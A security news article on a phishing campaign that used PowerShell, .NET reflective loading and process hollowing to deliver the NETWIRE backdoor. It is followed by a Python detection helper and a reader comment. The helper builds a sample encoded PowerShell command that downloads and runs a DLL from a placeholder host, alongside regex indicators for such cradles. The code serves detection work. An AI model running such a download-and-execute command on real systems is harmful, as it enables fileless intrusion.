Phishing campaign attacker targets multiple customers and successfully executes payload without having to write the executable dropper or the payload to the disk by using process hollowing.

Security researchers have discovered a recent phishing campaign where an attacker targeted multiple customers and successfully executed their payload without having to write the executable dropper or the payload to the disk.

According to a blog post by researchers at FireEye, the campaign kicked off in February this year and involved the use of VBScript, PowerShell and the .NET Framework to perform a code injection attack using a process hollowing technique.

"The attacker abused the functionality of loading .NET assembly directly into memory of PowerShell to execute malicious code without creating any PE files on the disk," said researchers.

According to researchers, the malware prompts the victim to open a document stored on Google Drive. It is thought that the hackers are targeting members of the airline industry that use a particular aircraft model. They added that there has been an increasing number of attackers relying on cloud-based file storage services that bypass firewall restrictions to host their payload.

Researchers said that, once executed and after multiple levels of obfuscation, a PowerShell script runs that loads a .NET assembly from a remote URL; functions of that assembly are then used to inject the final payload (the NETWIRE Trojan) into a benign Microsoft executable using process hollowing.

"This can potentially bypass application whitelisting since all processes spawned during the attack are legitimate Microsoft executables," said researchers.

The final payload in the attack was identified as a Netwire backdoor. Its capabilities include keylogging, reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt data and then writes it to a file created in the ./LOGS directory. The malware also contains a custom obfuscation algorithm to hide registry keys, APIs, DLL names, and other strings from static analysis.

"Malware authors continue to use different 'fileless' process execution techniques to reduce the number of indicators on an endpoint. The lack of visibility into .NET process execution combined with the flexibility of PowerShell makes this technique all the more effective," said researchers.
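For anyone who wants to hunt the behaviour described above in PowerShell command lines or ScriptBlock (Event ID 4104) text, here is an added Python triage helper. It is not FireEye's code and not an artefact of the campaign: it unwraps a Base64 -EncodedCommand, peels nested FromBase64String layers, and scores the result for the in-memory [System.Reflection.Assembly]::Load() of a downloaded blob. The indicator list, weights, threshold and the two sample command lines (including the placeholder host payload.example) are constructed assumptions for this example only.

```python
"""Triage helper for PowerShell that loads a .NET assembly from memory.

Added example, not FireEye's code or anything from the campaign. The
indicator set, weights, threshold and sample command lines are assumptions
constructed for the demo; payload.example is a placeholder host.
"""
import base64
import re

# Assumed indicator set: (regex over the unwrapped text, label, weight).
INDICATORS = [
    (r"\[(?:System\.)?Reflection\.Assembly\]::Load\(", "reflective .NET assembly load", 4),
    (r"Net\.WebClient|Invoke-WebRequest|DownloadData|DownloadString", "remote payload fetch", 2),
    (r"\bIEX\b|Invoke-Expression", "dynamic code execution", 2),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window", 1),
    (r"-nop\b|-noprofile", "profile bypass", 1),
    (r"FromBase64String", "embedded Base64 layer", 1),
]
SUSPICIOUS_THRESHOLD = 5  # assumed cut-off for the demo

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)


def _bytes_to_text(raw: bytes) -> str:
    """UTF-16LE (PowerShell's native encoding) if NUL bytes are present, else UTF-8."""
    if b"\x00" in raw:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def decode_encoded_command(cmdline: str) -> str:
    """Return the script hidden behind -EncodedCommand, or cmdline unchanged."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return _bytes_to_text(base64.b64decode(m.group(1)))
    except ValueError:  # bad padding or undecodable bytes: keep the raw line
        return cmdline


def peel_base64_layers(script: str, max_depth: int = 3) -> str:
    """Append the decoded content of every FromBase64String('...') literal,
    repeating so nested layers (the 'multiple levels of obfuscation' in the
    post) all become visible to the indicator scan."""
    text, seen = script, set()
    for _ in range(max_depth):
        layers = []
        for blob in B64_LITERAL.findall(text):
            if blob in seen:
                continue
            seen.add(blob)
            try:
                layers.append(_bytes_to_text(base64.b64decode(blob, validate=True)))
            except ValueError:
                continue
        if not layers:
            break
        text += "\n" + "\n".join(layers)
    return text


def analyze(cmdline: str) -> dict:
    """Unwrap the command line and score it against INDICATORS."""
    decoded = peel_base64_layers(decode_encoded_command(cmdline))
    haystack = cmdline + "\n" + decoded  # flags such as -w hidden live on the raw line
    hits = [label for pat, label, _ in INDICATORS if re.search(pat, haystack, re.I)]
    score = sum(w for _, label, w in INDICATORS if label in hits)
    return {"decoded": decoded, "hits": hits, "score": score,
            "suspicious": score >= SUSPICIOUS_THRESHOLD}


def _b64_utf16(s: str) -> str:
    """Encode text the way powershell.exe -EncodedCommand expects."""
    return base64.b64encode(s.encode("utf-16-le")).decode("ascii")


# Constructed samples (not real campaign artefacts).
BENIGN_CMDLINE = 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Logs | Measure-Object"'
_INNER = ("[System.Reflection.Assembly]::Load((New-Object Net.WebClient)"
          ".DownloadData('http://payload.example/loader.dll'))"
          ".GetType('Loader').GetMethod('Run').Invoke($null, $null)")
_OUTER = ("IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('%s')))"
          % _b64_utf16(_INNER))
MALICIOUS_CMDLINE = "powershell.exe -nop -w hidden -enc " + _b64_utf16(_OUTER)

if __name__ == "__main__":
    for line in (BENIGN_CMDLINE, MALICIOUS_CMDLINE):
        r = analyze(line)
        print(f"score={r['score']:2d} suspicious={r['suspicious']} hits={r['hits']}")
```

The scoring is deliberately layered: the reflective Assembly.Load alone is worth most of the threshold, because that is the step that keeps the dropper and payload off disk, while the hidden window and profile bypass only add weight when they sit next to it. Feed it the CommandLine field from process-creation events or the ScriptBlockText from 4104 events; it does not replace memory inspection of the hollowed host process, which is the only place the injected payload actually lives.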


Great article. Maybe this can be prevented by using, for example, Hitman Pro Alert with OS Armor?